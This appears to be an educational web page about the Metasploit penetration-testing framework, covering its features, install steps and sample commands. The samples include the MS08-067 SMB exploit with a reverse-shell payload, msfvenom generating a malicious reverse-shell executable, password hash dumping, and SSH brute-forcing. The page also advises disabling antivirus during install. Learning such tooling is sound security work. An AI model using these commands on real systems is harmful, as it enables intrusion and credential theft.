METASPLOIT FRAMEWORK

Vulnerability Scanner

Metasploit Framework is an open-source tool used by cybercriminals and ethical hackers to probe systematic vulnerabilities on networks and servers. It is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development. The MSFconsole is the most commonly used interface to work with the Metasploit Framework. Metasploit offers value in two primary ways to two different audiences. It provides a universal interface to work with vulnerability exploit code and has code for a wide range of vulnerabilities that impact web servers, OSes, network equipment, and everything in between. Metasploit offers value in two primary ways to two different audiences.

DOWNLOADS

SYSTEM REQUIREMENTS

RAM : Minimum 4 GB, recommended 8 GB for optimal performance.

Storage : Requires at least 1 GB of disk space, 50 GB is recommended for optimal performance, additional tools and data.

OS : Compatible with Linux, Windows, and macOS.

Architecture : Supports 64-bit systems.

Available On : PC


ADDITIONAL INFORMATION

Published By

Rapid7.

Release Date

2003.

Approximate Size

494.05 MB for the framework itself, but additional tools may increase the size.

Publisher Info

Rapid7 specializes in security solutions and vulnerability management.

Supported Languages

English

Last Update

Regularly updated, the latest stable release is from 2023.

Programming Language

Primarily written in Ruby, with some components in C and Python.

Operating System

Cross-platform

License

Open Source under the BSD License.

  • Set up encrypted communication between the target and your system.
  • Obtain dump password hashes from target system
  • Locate files on the filesystem of the target
  • Download or upload files
  • Take snapshots from the webcam of the target system

  1. Exploit development : Metasploit allows security researchers and developers to write their own exploit code or use pre-existing exploits for various vulnerabilities. These exploits are then integrated into the Metasploit Framework, making them easily accessible and customizable.
  2. Payloads : After an exploit is chosen for a specific vulnerability, Metasploit offers a variety of payloads that can be used to gain access to the target system. Payloads can range from simple bind or reverse shells to more complex Meterpreter scripts that enable advanced post-exploitation actions such as keylogging, screen capturing, and file system manipulation.
  3. Payload delivery : Once an exploit and payload are selected, Metasploit provides the means to deliver the payload to the target system. This is achieved by generating a customized attack payload that is tailored to the specific vulnerability being exploited.
  4. Exploit execution : The attack payload is then delivered to the target system, either by directly exploiting the vulnerability or by using other techniques such as social engineering or phishing attacks. If the exploit is successful, the payload is executed on the target system, granting access to the attacker.
  5. Post-exploitation : After gaining access to the target system, Metasploit offers a wide range of post-exploitation tools and scripts to gather information, escalate privileges, and maintain access. These tools help the attacker to further explore the target system and perform additional malicious actions.
  6. Reporting : Metasploit provides built-in reporting capabilities that allow security professionals to document their findings and generate comprehensive reports for their clients or management.

  1. Metasploit can integrate seamlessly with elements such as Windows patch enumeration, SNMP scanning during the information collection phase of a penetration test. It also provides a bridge to Tenable’s vulnerability scanner, Nessus. Metasploit integrates with almost any reconnaissance tool, allowing you to identify the vulnerability you want.
  2. When you find a vulnerability, you can search the extensible Metasploit database for an exploit that cracks it open. For example, the Shadow Brokers released the NSA EternalBlue exploit in 2017, packaged for Metasploit, which can help you handle an unpatched legacy Windows system.
  3. You match the exploit to an appropriate payload for the task. For example, Meterpreter is an interactive, in-memory-only shell, making it suitable for attacking a Windows system, given that most people want a shell. There are specific shellcodes for Linux boxes depending on the exploits used.

Metasploit Framework is a powerful tool for penetration testing, vulnerability assessment, and exploitation. Here are some examples of its usage :

Basic Examples
  1. Scanning for Vulnerabilities :

    2. $ msfconsole

    $ use auxiliary/scanner/portscan/tcp

    $ set RHOSTS 192.168.1.0/24

    $ run

    This scans a network for open TCP ports.

  2. Exploiting a Vulnerability :

    3. $ msfconsole

    $ use exploit/windows/smb/ms08_067_netapi

    $ set RHOST 192.168.1.100

    $ set PAYLOAD windows/meterpreter/reverse_tcp

    $ set LHOST 192.168.1.101

    $ exploit

    This exploits the MS08-067 vulnerability in Windows SMB to gain a reverse shell.

  3. Creating a Payload :

    4. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe > payload.exe

    Generates a malicious executable file for a reverse shell.

  4. Post-Exploitation :

    5. $ meterpreter > sysinfo

    $ meterpreter > hashdump

    $ meterpreter > screenshot

    Executes commands on the compromised system to gather information, dump password hashes, and capture screenshots.

Advanced Examples
  1. Brute Force Attack :

    2. $ msfconsole

    $ use auxiliary/scanner/ssh/ssh_login

    $ set RHOSTS 192.168.1.0/24

    $ set USERNAME admin

    $ set PASS_FILE passwords.txt

    $ run

    Attempts to brute-force SSH credentials.

  2. Custom Exploit Development :
    • Write a custom exploit module in Ruby.
    • Load it into Metasploit using the load command.
  3. Pivoting : meterpreter > route add 192.168.2.0 255.255.255.0 1

    4. Adds a route to pivot through the compromised machine to another network.

Practical Applications
  • Network Security Testing : Identify vulnerabilities in a network and test defenses.
  • Exploit Development : Create and test custom exploits.
  • Incident Response : Analyze and mitigate security breaches.

  • bundler
  • curl
  • gcc-mingw-w64-i686-win32
  • gcc-mingw-w64-x86-64-win32
  • git
  • john
  • libc6
  • libffi8
  • libgcc-s1
  • libpcap0.8
  • libpq5
  • libruby3.1
  • libsqlite3-0
  • libssl3
  • libstdc++6v
  • nasm
  • nmap
  • openssl
  • oracle-instantclient-basic
  • postgresql
  • python3
  • rake
  • ruby
  • ruby-json
  • wget

Terminal Installation Commands ...

$ sudo apt-get update

$ sudo apt install metasploit-framework

GUI Installation Steps ...
Linux
  1. Download the Installer Run :

    2. $ wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
  2. Grant Execution Permission : chmod +x metasploit-latest-linux-x64-installer.run
  3. Run the Installer : sudo ./metasploit-latest-linux-x64-installer.run
  4. Follow GUI Setup
    • Accept the license agreement
    • Choose installation directory (/opt/metasploit)
    • Configure firewall settings
    • Set GUI port (default : 3790)
Windows
  1. Disable Antivirus & Firewall (to prevent interference)
  2. Download Metasploit Installer from Rapid7
  3. Run the Installer
    1. Choose installation directory
    2. Configure database settings
    3. Set GUI port
  4. Launch Metasploit Console
    1. Open Metasploit from the Start Menu
MacOS
  1. Install Dependencies : brew install curl gpgv2 autoconf bison git-core
  2. Download Metasploit :

    3. $ curl -O http://downloads.metasploit.com/data/releases/metasploit-latest-macos-x64-installer.run
  3. Run the Installer :

    $ chmod +x metasploit-latest-macos-x64-installer.run

    $ sudo ./metasploit-latest-macos-x64-installer.run
  4. Follow GUI Setup :
    • Accept license agreement
    • Configure settings

Terminal Uninstallation Commands ...

$ sudo apt remove metasploit-framework

$ sudo apt autoclean && apt autoremove

GUI Uninstallation Steps ...
Linux
  1. Stop Metasploit Services : sudo /opt/metasploit/ctlscript.sh stop
  2. Run the Uninstaller : sudo /opt/metasploit/uninstall
  3. Confirm Deletion
    • Click Yes to remove all components
    • Click Yes again to delete saved project data
  4. Manually Remove Leftover Files : sudo rm -rf /opt/metasploit
Windows
  1. Open Control Panel → Programs & Features
  2. Find Metasploit Framework → Click Uninstall
  3. Confirm Deletion
    • Click Yes to remove all components
    • Click OK when the process completes
  4. Remove Registry Entries (if needed)
    • Open Registry Editor (Win + R → type regedit)
    • Navigate to :

      • $ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
    • Delete any Metasploit-related entries
MacOS
  1. Stop Metasploit Services : sudo /opt/metasploit-framework/bin/msfremove
  2. Run the Uninstaller : sudo ./msfremove
  3. Confirm Deletion
    • Type Y to remove all components
  4. Manually Remove Leftover Files : sudo rm -rf /opt/metasploit-framework

Copyright © 2025 HACKERSPOT

All original content, including tools, software, and other information, is protected by copyright and remains the property of its respective owners.

Subscribe for more Information
HACKERSPOT

HackerSpot is an informational platform that offers resources such as tools, software, courses, internships, and various other materials aimed at supporting individuals passionate about CyberSecurity and IT.

About Us
Docs / Links

Documentation

Tools

Softwares

Operating Systems

Learning

Courses

Internships

Virtual Labs

Colleges

Youtube Channels

Resources

Devices & Hardware

Browsers

Cyber Threat Maps

Other Resources

Contacts

Bapatla, Andhrapradesh, India 237101

bablunannam@gmail.com

+91 7995819235